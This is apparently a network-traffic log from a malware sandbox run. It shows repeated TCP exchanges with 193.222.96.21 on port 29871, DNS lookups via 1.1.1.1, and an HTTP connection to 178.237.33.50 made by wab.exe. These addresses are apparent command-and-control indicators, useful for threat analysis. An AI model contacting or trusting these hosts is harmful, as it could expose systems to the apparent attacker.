Apr 19, 2024 19:21:33.487056017 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.487066031 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487082958 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487102032 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487107038 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.487121105 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487124920 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.487138033 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487155914 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487157106 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.487189054 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487227917 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487231970 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.487266064 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487303972 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487308979 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.487341881 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487349033 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.487384081 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487421989 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487426996 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.487459898 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487499952 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487508059 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.487539053 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487576008 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487612009 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487624884 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.487651110 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487689018 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487692118 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.487726927 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487765074 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487772942 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.487802982 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487808943 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.487842083 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487879992 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487884998 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.487919092 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487957954 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.487962961 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.487997055 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.488034964 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.488071918 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.488075972 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.488142967 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.488182068 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.488192081 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.488219976 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.488224983 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.488260984 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.488300085 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.488338947 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.488344908 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.488379955 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.488382101 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.488419056 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.488456964 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.488462925 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.488496065 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.488533020 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.488538027 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.488575935 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.488590956 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.488614082 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.488646984 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.488652945 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.488671064 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.488691092 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.488729954 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.488770008 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.488780022 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.488809109 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.488812923 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.488850117 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.488894939 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.488924026 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.488960981 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.488996983 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.488998890 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.489038944 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.489077091 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.489085913 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.489114046 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.489151955 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.489190102 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.489193916 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.489243031 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.489254951 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.489280939 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.489320993 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.489365101 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.489371061 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.489378929 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.489399910 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.489456892 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.489486933 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.489496946 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.489536047 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.489574909 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.489579916 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.489614010 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.489653111 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.489667892 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.489690065 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.489694118 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.489729881 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.489765882 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.489769936 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.489808083 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.489846945 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.489882946 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.489885092 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.489922047 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.489950895 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.489959002 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.489998102 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.490037918 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.490037918 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.490075111 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.490083933 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.490114927 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.490153074 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.490164042 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.490190983 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.490230083 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.490241051 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.490268946 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.490308046 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.490345955 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.490358114 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.490386963 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.490425110 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.490427017 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.490463018 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.490472078 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.490499973 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.490537882 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.490542889 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.490575075 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.490614891 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.490619898 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.490653038 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.490689993 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.490729094 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.490736961 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.490766048 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.490771055 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.490806103 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.490844011 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.490855932 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.490883112 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.490921021 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.490931988 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.490957975 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.490994930 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.490999937 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.491033077 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.491086960 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.491096020 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.491126060 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.491163969 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.491167068 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.491203070 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.491240978 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:33.491249084 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:33.531626940 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:38.639235973 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:38.839879990 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:38.840010881 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:39.040636063 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:39.045872927 CEST | 29871 | 49719 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:39.046066046 CEST | 49719 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:57.421104908 CEST | 29871 | 49718 | 193.222.96.21 | 192.168.2.5 |
Apr 19, 2024 19:21:57.423424959 CEST | 49718 | 29871 | 192.168.2.5 | 193.222.96.21 |
Apr 19, 2024 19:21:57.670409918 CEST | 29871 | 49718 | 193.222.96.21 | 192.168.2.5 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 19, 2024 19:21:29.170655012 CEST | 51331 | 53 | 192.168.2.5 | 1.1.1.1 |
Apr 19, 2024 19:21:29.478403091 CEST | 53 | 51331 | 1.1.1.1 | 192.168.2.5 |
Apr 19, 2024 19:21:31.080805063 CEST | 64696 | 53 | 192.168.2.5 | 1.1.1.1 |
Apr 19, 2024 19:21:31.223259926 CEST | 53 | 64696 | 1.1.1.1 | 192.168.2.5 |
Apr 19, 2024 19:21:31.863403082 CEST | 61862 | 53 | 192.168.2.5 | 1.1.1.1 |
Apr 19, 2024 19:21:31.970638990 CEST | 53 | 61862 | 1.1.1.1 | 192.168.2.5 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Apr 19, 2024 19:21:29.170655012 CEST | 192.168.2.5 | 1.1.1.1 | 0xc3e3 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Apr 19, 2024 19:21:31.080805063 CEST | 192.168.2.5 | 1.1.1.1 | 0x9e53 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Apr 19, 2024 19:21:31.863403082 CEST | 192.168.2.5 | 1.1.1.1 | 0x561c | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Apr 19, 2024 19:21:29.478403091 CEST | 1.1.1.1 | 192.168.2.5 | 0xc3e3 | No error (0) | 172.67.191.112 | A (IP address) | IN (0x0001) | false | ||
Apr 19, 2024 19:21:29.478403091 CEST | 1.1.1.1 | 192.168.2.5 | 0xc3e3 | No error (0) | 104.21.60.38 | A (IP address) | IN (0x0001) | false | ||
Apr 19, 2024 19:21:31.223259926 CEST | 1.1.1.1 | 192.168.2.5 | 0x9e53 | No error (0) | 193.222.96.21 | A (IP address) | IN (0x0001) | false | ||
Apr 19, 2024 19:21:31.970638990 CEST | 1.1.1.1 | 192.168.2.5 | 0x561c | No error (0) | 178.237.33.50 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.5 | 49720 | 178.237.33.50 | 80 | 4424 | C:\Program Files (x86)\Windows Mail\wab.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Apr 19, 2024 19:21:32.178435087 CEST | 71 | OUT | |
Apr 19, 2024 19:21:32.391448975 CEST | 1171 | IN |